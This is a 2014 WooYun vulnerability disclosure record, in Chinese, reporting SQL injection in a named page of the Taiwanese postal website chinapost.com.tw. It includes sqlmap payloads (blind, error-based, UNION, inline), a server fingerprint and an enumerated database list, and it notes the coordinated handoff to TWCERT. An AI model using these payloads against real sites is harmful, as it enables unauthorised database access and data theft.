乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-03-10: 细节已通知厂商并且等待厂商处理中 2014-03-15: 厂商已经确认,细节仅向厂商公开 2014-03-25: 细节向核心白帽子及相关领域专家公开 2014-04-04: 细节向普通白帽子公开 2014-04-14: 细节向实习白帽子公开 2014-04-24: 细节向公众公开
RT
1.注入点(非中国邮政)http://www.chinapost.com.tw/guidepost/topics/default.asp?id=3577&sub=10
Place: GETParameter: sub Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=3577&sub=10 AND 9496=9496 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=3577&sub=10 AND 3261=CONVERT(INT,(SELECT CHAR(113)+CHAR(97)+CHAR(116)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (3261=3261) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(108)+CHAR(116)+CHAR(113))) Type: UNION query Title: Generic UNION query (NULL) - 16 columns Payload: id=3577&sub=-9613 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(97)+CHAR(116)+CHAR(98)+CHAR(113)+CHAR(109)+CHAR(106)+CHAR(97)+CHAR(121)+CHAR(83)+CHAR(70)+CHAR(107)+CHAR(113)+CHAR(122)+CHAR(88)+CHAR(113)+CHAR(119)+CHAR(108)+CHAR(116)+CHAR(113),NULL,NULL,NULL,NULL-- Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: id=3577&sub=(SELECT CHAR(113)+CHAR(97)+CHAR(116)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (9631=9631) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(108)+CHAR(116)+CHAR(113))---[13:55:45] [INFO] testing Microsoft SQL Server[13:55:46] [INFO] confirming Microsoft SQL Server[13:55:47] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000available databases [10]:[*] abm7[*] absolutebm[*] cpnews[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] sp[*] tempdb
过滤
危害等级:高
漏洞Rank:11
确认时间:2014-03-15 20:36
CNVD确认并复现所述情况,已经转由CNCERT通过直接联系渠道向TWCERT通报,由其后续协调当地网站管理单位处置。
暂无